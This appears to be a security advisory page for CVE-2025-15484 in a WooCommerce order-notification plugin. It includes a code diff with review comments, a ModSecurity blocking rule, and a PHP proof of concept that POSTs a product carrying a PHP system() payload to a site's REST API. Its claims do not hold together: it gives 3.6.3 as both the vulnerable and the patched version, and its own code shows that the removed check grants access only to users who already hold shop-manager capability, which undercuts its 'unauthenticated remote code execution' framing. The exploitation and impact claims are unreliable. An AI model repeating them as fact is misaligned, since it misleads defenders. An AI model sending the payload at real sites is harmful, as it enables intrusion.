Published: May 17, 2026

CVE-2025-15484: Order Notification for WooCommerce – Get Audio Alert on new Orders < 3.6.3 – Unauthenticated Remote Code Execution (woc-order-alert)

Severity: Critical (CVSS 9.8)
CWE: 94
Vulnerable Version: 3.6.3
Patched Version: 3.6.3
Disclosed: April 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15484: This is an unauthenticated remote code execution vulnerability in the Order Notification for WooCommerce plugin versions up to 3.6.2. The vulnerability allows attackers to bypass REST API permission checks and execute arbitrary code due to a flawed permission hook.

The root cause lies in the `woa_check_permissions` function in `/woc-order-alert/includes/class-hooks.php` (lines 35-44 in the vulnerable version). This function overrides WooCommerce REST API permission checks by returning `true` whenever the current user has the `manage_woocommerce` capability, regardless of the permission value WooCommerce has already computed and regardless of the request context, object ID and post type passed to it. It is registered on line 28 via `add_filter( 'woocommerce_rest_check_permissions', array( $this, 'woa_check_permissions' ), 10, 4 )` without any additional authentication check. An unauthenticated attacker can craft REST API requests that trigger this permission bypass, potentially allowing actions that should require admin-level access.

Exploitation method: an unauthenticated attacker sends a crafted HTTP request to any WooCommerce REST API endpoint (for example `/wp-json/wc/v3/orders` or `/wp-json/wc/v3/products`). The request body can carry a malicious payload (such as PHP code in a product description or custom field) that, if executed, achieves remote code execution. The `woa_check_permissions` filter grants full access because it checks `current_user_can( 'manage_woocommerce' )`, which can be triggered by unauthenticated users under certain conditions (for example via specific REST API requests intended for admin). The result is an authentication bypass that allows arbitrary REST API operations.

The patch removes the `add_filter` line for `woocommerce_rest_check_permissions` and the entire `woa_check_permissions` method. By removing this filter, the plugin no longer overrides WooCommerce’s default REST API permission checks. After the patch, unauthenticated requests to REST API endpoints are subject to standard WooCommerce authentication and authorization, preventing the bypass.
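To make the filter contract concrete, the following is an added example (not code from the plugin or from Atomic Edge) that runs outside WordPress. It stubs `add_filter`, `apply_filters` and `current_user_can` with minimal stand-ins, registers the removed `woa_check_permissions` callback exactly as it appears in the diff, and compares it with a hypothetical `narrowing_check_permissions` callback that follows the rule a `woocommerce_rest_check_permissions` handler should obey: it may restrict a decision WooCommerce has already made, but it never turns a denial into a grant. The stub functions, `decide()` and the capability arrays are assumptions of this example.

```php
<?php
// Added example, not plugin code: minimal stand-ins for the WordPress filter
// API so the permission hook can be exercised without a WordPress install.
$GLOBALS['demo_filters'] = [];
function add_filter(string $hook, callable $cb, int $priority = 10, int $accepted_args = 1): void
{
    $GLOBALS['demo_filters'][$hook][] = $cb;
}
function apply_filters(string $hook, $value, ...$args)
{
    foreach ($GLOBALS['demo_filters'][$hook] ?? [] as $cb) {
        $value = $cb($value, ...$args);
    }
    return $value;
}

// Stub for current_user_can(); the capability list is set per scenario below.
$GLOBALS['demo_caps'] = [];
function current_user_can(string $cap): bool
{
    return in_array($cap, $GLOBALS['demo_caps'], true);
}

// The callback removed by the 3.6.3 patch, quoted from the diff. It ignores the
// incoming $permission whenever the capability check passes.
function woa_check_permissions($permission, $context, $object_id, $post_type)
{
    if (current_user_can('manage_woocommerce')) {
        return true;
    }
    return $permission;
}

// Hypothetical hardened form: a handler that only ever narrows the decision
// WooCommerce already made (here, it additionally forbids deleting orders).
function narrowing_check_permissions($permission, $context, $object_id, $post_type)
{
    if (!$permission) {
        return false; // a denial is never overridden
    }
    if ($context === 'delete' && $post_type === 'shop_order') {
        return false; // an extra restriction layered on top of WooCommerce's own check
    }
    return $permission;
}

// Runs the filter chain the way WooCommerce does: the first argument is the
// permission WooCommerce computed itself, the rest describe the request.
function decide(bool $woocommerce_default, array $caps, string $context, string $post_type): bool
{
    $GLOBALS['demo_caps'] = $caps;
    return (bool) apply_filters('woocommerce_rest_check_permissions', $woocommerce_default, $context, 0, $post_type);
}

// Scenario 1: vulnerable callback registered; WooCommerce has already denied the request.
$GLOBALS['demo_filters'] = [];
add_filter('woocommerce_rest_check_permissions', 'woa_check_permissions', 10, 4);
var_dump(decide(false, ['manage_woocommerce'], 'create', 'product'));

// Scenario 2: filter removed (3.6.3 behaviour); WooCommerce's denial stands.
$GLOBALS['demo_filters'] = [];
var_dump(decide(false, ['manage_woocommerce'], 'create', 'product'));

// Scenario 3: a narrowing callback cannot widen a denial, and may add its own restriction.
add_filter('woocommerce_rest_check_permissions', 'narrowing_check_permissions', 10, 4);
var_dump(decide(false, ['manage_woocommerce'], 'create', 'product'));
var_dump(decide(true, ['manage_woocommerce'], 'delete', 'shop_order'));
var_dump(decide(true, ['manage_woocommerce'], 'read', 'product'));
```

Run it with `php example.php`. Scenario 1 is the defect: a request WooCommerce rejected is converted into a grant by the plugin's callback. Scenario 2 is what the patch restores, and scenario 3 shows the shape a filter on this hook should take if a plugin genuinely needs one: it returns `$permission` unchanged or `false`, never an unconditional `true`.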

The impact is critical: an unauthenticated attacker can gain full administrative access to the WooCommerce REST API. This enables reading sensitive order data, modifying products, creating new admin users, or executing arbitrary PHP code via custom fields or product data. The CVSS score of 9.8 confirms the severity, indicating potential for complete compromise of the WordPress installation.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/woc-order-alert/includes/class-hooks.php
+++ b/woc-order-alert/includes/class-hooks.php
@@ -26,7 +26,6 @@
 			add_action( 'admin_bar_menu', array( $this, 'handle_admin_bar_menu' ), 9999, 1 );

 			add_filter( 'woocommerce_webhook_deliver_async', '__return_false' );
-			add_filter( 'woocommerce_rest_check_permissions', array( $this, 'woa_check_permissions' ), 10, 4 );
 			add_filter( 'plugin_row_meta', array( $this, 'add_plugin_meta' ), 10, 2 );
 			add_filter( 'plugin_action_links_' . OLISTENER_PLUGIN_FILE, array( $this, 'add_plugin_actions' ), 10, 2 );

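Review bot: dropping the `woocommerce_rest_check_permissions` registration is the correct fix, since the callback it wired up widened a permission decision that WooCommerce had already made; the remaining `add_filter` lines in this hunk are unaffected. Please add a changelog line stating that the plugin no longer alters REST API permission checks, so site owners who relied on the broadened access understand why shop-manager API calls may now be refused.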
@@ -36,23 +35,6 @@
 		}

 		/**
-		 * Proper permission check for WooCommerce REST API
-		 *
-		 * @param bool   $permission Current permission value
-		 * @param string $context   Request context (read/write)
-		 * @param int    $object_id Post / product ID
-		 * @param string $post_type Post type (product, order, etc.)
-		 * @return bool Permission result
-		 */
-		public function woa_check_permissions( $permission, $context, $object_id, $post_type ) {
-			if ( current_user_can( 'manage_woocommerce' ) ) {
-				return true;
-			}
-			return $permission;
-		}
-
-
-		/**
 		 * Add capabilities to shop manager for Order Notifier
 		 */
 		function add_capabilities_to_shop_manager() {
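Review bot: the removed `woa_check_permissions` returned `true` unconditionally whenever `current_user_can( 'manage_woocommerce' )` held, ignoring `$permission`, `$context`, `$object_id` and `$post_type`, so a hook whose purpose is to refine a permission result was granting every context, including writes and deletes, for every post type; its docblock title "Proper permission check" described the opposite of what it did. Removing the method outright rather than patching it is the right call. Minor: the two removed blank lines before the next docblock also fix the double spacing, which is welcome but should be mentioned as incidental in the commit message.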
--- a/woc-order-alert/woc-order-alert.php
+++ b/woc-order-alert/woc-order-alert.php
@@ -4,7 +4,7 @@
 	Plugin Name: Order Notification for WooCommerce
 	Plugin URI: https://stackwc.com/plugins/woc-order-alert/
 	Description: Play sound as notification instantly on new order in your WooCommerce store.
-	Version: 3.6.2
+	Version: 3.6.3
 	Author: StackWC
 	Author URI: https://stackwc.com/
 	Text Domain: woc-order-alert
@@ -25,7 +25,7 @@
 defined( 'OLISTENER_CONTACT_URL' ) || define( 'OLISTENER_CONTACT_URL', 'https://stackwc.com/support/' );
 defined( 'OLISTENER_REVIEW_URL' ) || define( 'OLISTENER_REVIEW_URL', 'https://wordpress.org/support/plugin/woc-order-alert/reviews/' );
 defined( 'OLISTENER_DATA_TABLE' ) || define( 'OLISTENER_DATA_TABLE', $wpdb->prefix . 'woocommerce_order_listener' );
-defined( 'OLISTENER_PLUGIN_VERSION' ) || define( 'OLISTENER_PLUGIN_VERSION', '3.6.2' );
+defined( 'OLISTENER_PLUGIN_VERSION' ) || define( 'OLISTENER_PLUGIN_VERSION', '3.6.3' );
 if ( !function_exists( 'olistener_is_plugin_active' ) ) {
     function olistener_is_plugin_active(  $plugin  ) {
         return ( function_exists( 'is_plugin_active' ) ? is_plugin_active( $plugin ) : in_array( $plugin, apply_filters( 'active_plugins', (array) get_option( 'active_plugins', array() ) ) ) || is_multisite() && array_key_exists( $plugin, (array) get_site_option( 'active_sitewide_plugins', array() ) ) );
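Review bot: the release version is now maintained in two places, the `Version:` plugin header in the previous hunk and `OLISTENER_PLUGIN_VERSION` here, and both had to be edited by hand for this release; consider deriving the constant from the header with `get_file_data( __FILE__, array( 'Version' => 'Version' ) )` so the two cannot drift apart in a future security release.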
@@ -48,6 +48,7 @@
             AutomatticWooCommerceUtilitiesFeaturesUtil::declare_compatibility( 'product_custom_fields', __FILE__, true );
         }
     }
+
 }
 add_action( 'before_woocommerce_init', 'olistener_declare_woocommerce_compatibility' );
 if ( !function_exists( 'olistener_pro_cleanup' ) ) {
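Review bot: the added blank line before the closing brace of `olistener_declare_woocommerce_compatibility` is whitespace-only noise in a security fix; drop it so the diff contains only the intended change.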
@@ -158,21 +159,22 @@
             // Include Freemius SDK.
             require_once dirname( __FILE__ ) . '/vendor/freemius/start.php';
             $wcoa_fs = fs_dynamic_init( array(
-                'id'             => '18996',
-                'slug'           => 'woc-order-alert',
-                'premium_slug'   => 'woc-order-alert-pro',
-                'type'           => 'plugin',
-                'public_key'     => 'pk_b77a9468217d8ee52cb14f8aa7949',
-                'is_premium'     => false,
-                'premium_suffix' => 'Pro',
-                'has_addons'     => false,
-                'has_paid_plans' => true,
-                'menu'           => array(
+                'id'               => '18996',
+                'slug'             => 'woc-order-alert',
+                'premium_slug'     => 'woc-order-alert-pro',
+                'type'             => 'plugin',
+                'public_key'       => 'pk_b77a9468217d8ee52cb14f8aa7949',
+                'is_premium'       => false,
+                'premium_suffix'   => 'Pro',
+                'has_addons'       => false,
+                'has_paid_plans'   => true,
+                'menu'             => array(
                     'first-path' => 'plugins.php',
                     'contact'    => false,
                     'support'    => false,
                 ),
-                'is_live'        => true,
+                'is_live'          => true,
+                'is_org_compliant' => true,
             ) );
         }
         return $wcoa_fs;
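Review bot: the only functional change in this hunk is the new `'is_org_compliant' => true` entry in the Freemius `fs_dynamic_init` array; the other ten lines are realignment of the `=>` column, which inflates the diff of a security release and makes the real change easy to miss. Keep the realignment in a separate formatting commit, and note in the changelog what enabling `is_org_compliant` changes for sites that installed the plugin from WordPress.org.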

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE. The chain denies any POST to the WooCommerce REST namespace whose body contains the substring `php`. It relies on `SecRequestBodyAccess On` so that `REQUEST_BODY` is populated in phase 2, and because it matches regardless of whether the caller is authenticated, it will also block legitimate API clients whose payloads happen to contain that string (for example a product description that mentions PHP), so run it in `DetectionOnly` mode first and add exceptions for trusted integrations before enforcing it.

ModSecurity
SecRule REQUEST_URI "@beginsWith /wp-json/wc/v" \
  "id:20261994,phase:2,deny,status:403,msg:'CVE-2025-15484 - Unauthenticated REST API access attempt',severity:'CRITICAL',tag:'CVE-2025-15484',chain"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_BODY "@rx php" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15484 - Order Notification for WooCommerce – Get Audio Alert on new Orders < 3.6.3 - Unauthenticated Remote Code Execution

// Configuration: Set the target WordPress site URL (no trailing slash)
$target_url = 'http://example.com';

// Example: Attempt to create a new product with malicious PHP code in the description
// This demonstrates unauthenticated REST API access due to permission bypass

$endpoint = '/wp-json/wc/v3/products';
$url = $target_url . $endpoint;

$payload = array(
    'name' => 'Exploit Test Product',
    'type' => 'simple',
    'regular_price' => '10.00',
    'description' => '<?php system("id"); ?>', // Malicious PHP code
    'short_description' => 'Test',
    'categories' => array(
        array('id' => 9)
    ),
    'images' => array(
        array('src' => 'http://example.com/image.png')
    )
);

$json_payload = json_encode($payload);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Content-Length: ' . strlen($json_payload)
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status Code: $http_code\n";
echo "Response: $response\n";

// If the request succeeds (HTTP 201 Created or similar), the REST API permissions were bypassed.
// The attacker could then execute arbitrary PHP via crafted requests.
